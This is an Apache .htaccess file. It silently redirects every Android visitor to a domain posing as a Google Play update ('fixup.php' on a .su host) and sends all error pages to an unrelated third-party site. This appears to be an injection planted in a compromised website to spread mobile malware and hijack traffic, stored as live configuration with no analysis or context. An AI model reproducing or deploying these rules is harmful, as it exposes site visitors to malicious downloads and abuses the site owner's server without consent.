RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://ANDROIDUPDATESFROMGOOGLEPLAY.SU/fixup.php
ErrorDocument 400 http://megafxs.com
ErrorDocument 401 http://megafxs.com
ErrorDocument 403 http://megafxs.com
ErrorDocument 404 http://megafxs.com
ErrorDocument 500 http://megafxs.com